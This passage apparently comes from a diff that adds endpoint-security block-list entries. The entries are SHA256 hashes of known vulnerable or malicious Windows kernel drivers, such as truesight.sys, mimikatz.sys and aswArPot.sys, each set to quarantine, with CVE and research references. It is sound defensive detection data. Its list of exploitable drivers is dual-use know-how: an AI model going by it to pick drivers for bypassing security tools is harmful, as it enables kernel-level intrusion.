+ "creation_date": "2026-03-23T11:45:29.971312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971320Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab2632a4d93a7f3b7598c06a9fdc773a1b1b69a7dd926bdb7cf578992628e9dd",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc3e60c7-e00e-5a31-9130-700992144386",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973940Z",
+ "creation_date": "2026-03-23T11:45:29.973949Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973954Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcfc2c9883e6c1b8429be44cc4db988a9eecb544988fbd756d18cfca6201876f",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc3ee6f9-b4aa-5aa1-bc29-cc880402c9d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982218Z",
+ "creation_date": "2026-03-23T11:45:29.982220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d475c4fe917020d420b5d0cf1f074b1427f49bd1f4414873501be51700f8832d",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc53a9ef-7ecd-582e-b27d-29cda1eff782",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835993Z",
+ "creation_date": "2026-03-23T11:45:30.835995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836000Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2a952ae1cb72f017e48e6d382d20765883b3ce2bc5ca15c4da0d07773551aa3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc56ebfa-7aac-52a9-b34a-524e630fcbfb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461469Z",
+ "creation_date": "2026-03-23T11:45:30.461472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70b63dfc3ed2b89a4eb8a0aa6c26885f460e5686d21c9d32413df0cdc5f962c7",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc57c00c-40f2-5f3f-b847-711d7f149cdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976371Z",
+ "creation_date": "2026-03-23T11:45:29.976373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976378Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc788772-cb85-5ca2-bc40-4bd00edceec5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821978Z",
+ "creation_date": "2026-03-23T11:45:31.821982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "214b840974ebc8cd5a2ba581ee1a903712b8c6db0fcc6f5a998cb732c9184b97",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc8185cd-125d-59f3-8e9e-9a36cbc3dd46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153542Z",
+ "creation_date": "2026-03-23T11:45:31.153544Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153550Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56ebc84e95e54a28d8bb557ebdbdc89a4e7b9205c653298a0bcc3a0159269a1b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc81b4c2-3d5c-5ace-8017-52ed6980f453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830615Z",
+ "creation_date": "2026-03-23T11:45:30.830617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8d8cf37f98bb285db5b6abcfe1b25fb0c2b43dc2146dc1714af88fd6ae9cab7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc89e5a8-6cc1-5ab7-bca9-03d3917f1a27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617219Z",
+ "creation_date": "2026-03-23T11:45:29.617221Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc8acceb-e8e2-54f1-8063-00f933dbeaa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969647Z",
+ "creation_date": "2026-03-23T11:45:29.969649Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e76d989489c80b5e57b12b0dbfe04063701cb0e1239a9dbe50498978dd5a71ba",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc928b78-a713-5f4d-a57f-c8b22af44afd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484359Z",
+ "creation_date": "2026-03-23T11:45:31.484362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484372Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c36b249512c286e8c26149c44ee703da62698a754413b0cc5a55d42e06b3509f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc9367bd-aeed-5e97-9bfb-98309337a8b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499459Z",
+ "creation_date": "2026-03-23T11:45:31.499462Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499470Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d47053aa2533e477f86a6848b1ca9b895cf4b3bfb2870d9481be4321b7defbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc9d50be-07f3-598a-ab27-9e73c429f93c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467442Z",
+ "creation_date": "2026-03-23T11:45:30.467445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ac415873e0a8638f5154ac4c1713b6f0527119b59706df65a5b3ed73ece02a6",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bca5722f-c83d-5260-bdc0-cd6044901b41",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972681Z",
+ "creation_date": "2026-03-23T11:45:29.972683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f353fc46843155b6b63e75994f5328b9d4344654d5759a5145cd6e64babe3de",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bca66824-c9b5-5edd-80b6-52903e933a6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615606Z",
+ "creation_date": "2026-03-23T11:45:29.615608Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615614Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48ac8ae911c490e1b7f7813c0f345677e110ffaa9ef385b86ca25e5519e2c0de",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcb3b05b-8299-5fa4-8f9b-bc5e9f4a1e24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148131Z",
+ "creation_date": "2026-03-23T11:45:31.148133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eafe1af8bd0bf72746a7dac888fab44660b7874e7dc873f3b841534bd4a288b9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcc3d352-47de-5596-8828-c622a24bc267",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470640Z",
+ "creation_date": "2026-03-23T11:45:30.470643Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dca34739f3935caed2af248206452e7ba1fdf394c901e74729b5a96884dc6228",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcc709ac-d8fd-57b9-8ba0-995016e9cb19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453912Z",
+ "creation_date": "2026-03-23T11:45:30.453916Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0181d60506b1f3609217487c2c737621d637e1232f243f68c662d045f44d4873",
+ "comment": "Malicious Kernel Driver (aka 4118b86e490aed091b1a219dba45f332.sys) [https://www.loldrivers.io/drivers/b32d8d7d-0dc2-4d09-a306-8efc4caf1839/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcc7712a-d3e5-5bb1-941c-d2f950191884",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462398Z",
+ "creation_date": "2026-03-23T11:45:30.462402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd9386206a5dfdf63bf642e2917fae6d5e8a1e52874cb2cfbabf79e47b9fed74",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bccb1037-c236-5ce3-b136-645abad8f0fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479699Z",
+ "creation_date": "2026-03-23T11:45:31.479704Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1799e5e5eb44ccfc05a608a774123de9904eb0a7ef66b5bc700bbe6cc2c8050b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bccb6707-2470-56d6-be44-f176b497bb65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827551Z",
+ "creation_date": "2026-03-23T11:45:31.827553Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827558Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac886acabff4efcbb5bf8c3646ffc3d69b430071c930f75901cc28fca58b0426",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcda955c-3634-58d4-92e9-361191d9d609",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978994Z",
+ "creation_date": "2026-03-23T11:45:29.978996Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
